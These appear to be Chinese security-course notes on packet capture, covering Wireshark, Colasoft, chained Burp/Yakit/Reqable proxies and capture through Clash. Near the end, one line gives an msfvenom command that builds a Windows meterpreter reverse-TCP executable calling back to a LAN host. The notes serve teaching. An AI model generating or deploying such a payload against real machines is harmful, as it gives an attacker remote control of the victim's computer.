2024小迪安全基础入门第七课

目录

一、抓包技术-Web&App&小程序&PC-扶墙双层

[二、 抓包技术-Web&App&小程序&PC-项目联动](#二、 抓包技术-Web&App&小程序&PC-项目联动)

三、抓包技术-Web&App&小程序&PC-全局协议


一、抓包技术-Web&App&小程序&PC-扶墙双层

Wireshark:

https://www.wireshark.org/

网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。

科来网络分析系统:

https://www.colasoft.com.cn/

该系统具有行业领先的专家分析技术,通过捕获并分析网络中传输的底层数据包,对网络故障、网络安全以及网络性能进行全面分析,从而快速排查网络中出现或潜在的故障、安全及性能问题。

二、 抓包技术-Web&App&小程序&PC-项目联动

#抓包工具联动

意义:让一个数据包同时经过不同安全测试工具进行扫描

Burp->Yakit

1、Burp 127.0.0.1:8080

2、Yakit 127.0.0.1:8083

3、让Burp将给到Yakit

4、系统的代理设置:127.0.0.1:8080

Yakit->Burp

1、Yakit 127.0.0.1:8083

2、设置下游 127.0.0.1:8080

3、Burp 127.0.0.1:8080

4、系统的代理设置:127.0.0.1:8083

Burp->Yakit->Reqable

1、Burp 127.0.0.1:8080

2、Yakit 127.0.0.1:8083

3、让Burp将给到Yakit

4、系统的代理设置:127.0.0.1:8080

5、Yakit设置下游 127.0.0.1:9000

三、抓包技术-Web&App&小程序&PC-全局协议

#科学上网抓包

Clash+Burp Clash+Yakit

解决:

1、目标需要采用梯子才能访问

2、IP隐藏去访问并要进行抓包

#全局协议抓包

WireShark 科来网络系统

1、解决部分代理校验

有部分的app web 小程序 当设置了代理后无法抓包

校验:检测到了当前机器的代理设置 做了一个策略防止

做了代理的设置数据走向:本身应用-代理-还没有到网卡-给到监听抓包工具

没有做代理的数据走向:本身应用-服务器(网卡抓包) 代理是在网卡之前产生

2、APP/小程序/PC应用

由于应用类型不同,不是说所有的应用都有https协议的数据

3、蓝队分析TCP/UDP应用

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.9 lport=6666 -f exe -o 9.exe

相关推荐
是孑然呀1 小时前
【小记】word批量生成准考证
笔记·学习·excel
{{uname}}2 小时前
利用WebSocket实现实时通知
网络·spring boot·websocket·网络协议
我不想当小卡拉米4 小时前
【Linux】操作系统入门:冯诺依曼体系结构
linux·开发语言·网络·c++
思科小白白4 小时前
【无标题】
网络·智能路由器
FreeBuf_4 小时前
GNU Screen 曝多漏洞:本地提权与终端劫持风险浮现
安全·web安全·gnu
yayaer24 小时前
GOOSE 协议中MAC配置
服务器·网络·goose
苏生要努力5 小时前
第九届御网杯网络安全大赛初赛WP
linux·python·网络安全
嵌入式在学无敌大神5 小时前
IP协议、以太网包头及UNIX域套接字
网络·tcp/ip·unix
2501_915909065 小时前
iOS App 安全性探索:源码保护、混淆方案与逆向防护日常
websocket·网络协议·tcp/ip·http·网络安全·https·udp
毫秒AI获客5 小时前
小红书多账号运营效率优化:技术方案与自动化实践
笔记